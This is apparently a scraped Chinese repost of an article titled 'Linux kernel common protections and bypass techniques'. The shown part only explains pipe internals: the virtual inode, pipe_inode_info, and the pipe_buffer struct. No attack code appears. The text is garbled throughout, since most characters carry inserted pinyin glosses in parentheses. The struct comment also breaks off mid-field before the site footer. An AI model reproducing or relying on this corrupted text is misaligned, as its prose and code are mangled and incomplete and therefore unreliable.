前置知識(shí):pipe管道Linux內(nèi)核中,管道本質(zhì)是創(chuàng)建一個(gè)虛擬的inode(即創(chuàng)建一個(gè)虛擬文件節(jié)點(diǎn))來表示,其中在節(jié)點(diǎn)上描述管道信息的結(jié)構(gòu)體為 pipe_inode_info(inode->i_pipe). 其中包含一個(gè)管道的所有信息。當(dāng)創(chuàng)建一個(gè)管道時(shí),內(nèi)核會(huì)創(chuàng)建 VFS inode,pipe_inode_info結(jié)構(gòu)體、兩個(gè)文件描述符(代表著管道的兩端)、pipe_buffer結(jié)構(gòu)體數(shù)組。管道原理的示意圖列。

用來表示管道中數(shù)據(jù)的是一個(gè) pipe_buffer結(jié)構(gòu)數(shù)組,單個(gè) pipe_buffer結(jié)構(gòu)體用來表示管道中單張內(nèi)存頁的數(shù)據(jù):

/**
 *  struct pipe_buffer - a linux kernel pipe buffer
 *  @page: 管道緩沖區(qū)存放了數(shù)據(jù)的頁
 *  @offset: 在@page中數(shù)據(jù)的偏移
 *  @len: 在@page中數(shù)                                                

                                                網(wǎng)站標(biāo)題:Linux內(nèi)核常用保護(hù)和繞過技術(shù)                                                

                                                本文來源:http://m.5511xx.com/article/ccioggd.html